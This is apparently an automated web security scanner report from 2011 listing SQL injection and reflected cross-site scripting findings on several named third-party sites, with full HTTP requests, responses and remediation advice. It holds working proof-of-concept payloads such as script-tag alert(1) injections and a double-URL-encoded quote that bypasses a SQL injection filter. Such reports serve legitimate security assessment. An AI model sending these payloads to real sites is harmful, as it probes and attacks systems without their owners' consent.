16.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.7. http://c14.zedo.com/OzoDB/cutils/R53_7_7/jsc/1545/zpu.html

16.8. http://d3.zedo.com/jsc/d3/ff2.html

16.9. http://p.raasnet.com/partners/universal/in

16.10. http://sana.newsinc.com/sana.html

16.11. http://view.atdmt.com/ADO/iview/278612752/direct

16.12. http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737

16.13. http://view.atdmt.com/CNT/iview/334302974/direct/01/4245069

16.14. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1

16.15. http://virtualgoods.bigdoor.com/media/html/gambit/about.html

16.16. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php

17. Content type incorrectly stated

17.1. http://4qinvite.4q.iperceptions.com/1.aspx

17.2. http://ads.pointroll.com/PortalServe/

17.3. http://adserv.impactengine.com/www/kr/36/ui/b8/objembed.html/@@1315499800@@

17.4. http://amch.questionmarket.com/adsc/d879999/4/880134/randm.js

17.5. http://amch.questionmarket.com/adsc/d907755/101/908678/adscout.php

17.6. http://amch.questionmarket.com/adscgen/st.php

17.7. http://amch.questionmarket.com/adscgen/sta.php

17.8. http://bin.clearspring.com/at/v/1/button1.6.swf

17.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs

17.10. http://class.savannahnow.com/classifieds-bin/classifieds

17.11. http://drupal.org/misc/favicon.ico

17.12. http://go.savannahnow.com/partner_json/search

17.13. http://imp.fetchback.com/serve/fb/adtag.js

17.14. http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/geoload.jhtml

17.15. http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/json/advisory.jhtml

17.16. http://intl.esperanto.mtvi.com/sitewide/scripts/widgets/geo/json/persistent.jhtml

17.17. http://metrics.impactengine.com/rest/reveal/129534/5011/Expand_Content

17.18. http://metrics.impactengine.com/rest/view/129534/5011/0

17.19. http://metrics.impactengine.com/rest/view/129534/5011/30

17.20. http://p.raasnet.com/partners/dfp

17.21. http://pglb.buzzfed.com/148250/91bc34b96eac101805574950b6644cc6

17.22. http://ps2.newsinc.com/Playlist/show/10557/4106/994.xml

17.23. http://s0.2mdn.net/2251996/Pixel_1x1.jpg

17.24. http://www.cargoh.com/sites/all/themes/cargoh/images/icons/fav_mail.gif

17.25. http://www.mtv.co.uk/files/favicon.ico

17.26. http://www.onsugar.com/favicon.ico

17.27. http://www.pdx.edu/sites/all/themes/pdx_home/favicon.ico

17.28. http://www.pdx.edu/sites/all/themes/pdx_primary/fonts/book/SquareSerif-Book-webfont.woff

17.29. http://www.popsugar.com/ajaxharness

17.30. http://www.popsugar.com/favicon.ico

17.31. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico

18. Content type is not specified

18.1. http://ad.yieldmanager.com/st

18.2. http://ads.bluelithium.com/st


1. SQL injection  next
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://ciphertex.com/content/product-comparison [SESSe7e1ce4917bcb7c6c1e7e1e807484f3c cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ciphertex.com
Path:   /content/product-comparison

Issue detail

The SESSe7e1ce4917bcb7c6c1e7e1e807484f3c cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SESSe7e1ce4917bcb7c6c1e7e1e807484f3c cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the SESSe7e1ce4917bcb7c6c1e7e1e807484f3c cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /content/product-comparison HTTP/1.1
Host: ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e%2527; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response 1

HTTP/1.1 503 Service Unavailable
Date: Mon, 12 Sep 2011 12:45:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=1
Expires: Mon, 12 Sep 2011 12:45:28 GMT
Vary: Accept-Encoding
Content-Length: 2608
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
</em> error was: <em>
...[SNIP]...

Request 2

GET /content/product-comparison HTTP/1.1
Host: ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e%2527%2527; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response 2

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:45:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:27 GMT
Vary: Accept-Encoding
Content-Length: 58017
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
<meta ht
...[SNIP]...
1.2. http://ciphertex.com/content/product-comparison [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ciphertex.com
Path:   /content/product-comparison

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /content/product-comparison HTTP/1.1
Host: ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1%2527; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response 1

HTTP/1.1 503 Service Unavailable
Date: Mon, 12 Sep 2011 12:46:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=1
Expires: Mon, 12 Sep 2011 12:46:07 GMT
Vary: Accept-Encoding
Content-Length: 2608
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
</em> error was: <em>
...[SNIP]...

Request 2

GET /content/product-comparison HTTP/1.1
Host: ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1%2527%2527; __utmb=187742778.5.9.1315849453904; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response 2

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:46:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:06 GMT
Vary: Accept-Encoding
Content-Length: 58017
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
<meta ht
...[SNIP]...
1.3. http://www.ciphertex.com/themes/garland/minnelli/minnelli.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ciphertex.com
Path:   /themes/garland/minnelli/minnelli.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /themes%2527/garland/minnelli/minnelli.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response 1

HTTP/1.1 503 Service Unavailable
Date: Mon, 12 Sep 2011 12:44:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Cache-Control: max-age=1
Expires: Mon, 12 Sep 2011 12:44:58 GMT
Vary: Accept-Encoding
Content-Length: 2608
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
</em> error was: <em>
...[SNIP]...

Request 2

GET /themes%2527%2527/garland/minnelli/minnelli.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:58 GMT
Vary: Accept-Encoding
Content-Length: 9996
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
2. Cross-site scripting (reflected)  previous  next
There are 145 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://4qinvite.4q.iperceptions.com/1.aspx [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://4qinvite.4q.iperceptions.com
Path:   /1.aspx

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a61f2'-alert(1)-'18bb0f0ae28 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1.aspx?sdfc=db35e419-4469-64f48812-f81a-4e4c-930c-5aa18d636b5f&lID=1&loc=4Q-WEB2a61f2'-alert(1)-'18bb0f0ae28 HTTP/1.1
Host: 4qinvite.4q.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.digitaldollhouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE01
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Mon, 12 Sep 2011 12:50:24 GMT
Content-Length: 1296

var sID= '5432'; var sC= 'IPE5432';var rF='False'; var brow= 'Chrome'; var vers= '13'; var lID= '1'; var loc= '4Q-WEB2a61f2'-alert(1)-'18bb0f0ae28'; var ps='sdfc=db35e419-4469-64f48812-f81a-4e4c-930c-5aa18d636b5f&lID=1&loc=4Q-WEB2a61f2%27-alert(1)-%2718bb0f0ae28';var IPEspeed = 5;var _invite = 'ips-invite'; rn='5432';var sGA='';function setupGA(
...[SNIP]...
2.2. http://ad.yieldmanager.com/rw [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /rw

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b97c8"><script>alert(1)</script>99f052b9bda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy%2EdJAYBFUAbL90kBgEVQAAAeoulitI%2EZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE%2DS2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enowpublic%2Ecom%252F%2CB%253D10%2526Z%253D0x0%2526%5Fsalt%253D1964679122%2526anmember%253D541%2526anprice%253D%2526r%253D1%2526s%253D1620509%2526y%253D29%2C7d9e50b4%2Ddd3d%2D11e0%2D90ef%2D78e7d161fe68&b97c8"><script>alert(1)</script>99f052b9bda=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:38 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Content-Length: 828
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title></title></head><body style="margin-left:0%;margin-right:0%;margin-top:0%;margin-bottom:0%"><iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" framebord
...[SNIP]...
hy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68&b97c8"><script>alert(1)</script>99f052b9bda=1">
...[SNIP]...
2.3. http://ad.yieldmanager.com/rw [qs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /rw

Issue detail

The value of the qs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fcde"><script>alert(1)</script>44f1c8c103a was submitted in the qs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw?title=&qs=5fcde"><script>alert(1)</script>44f1c8c103a HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
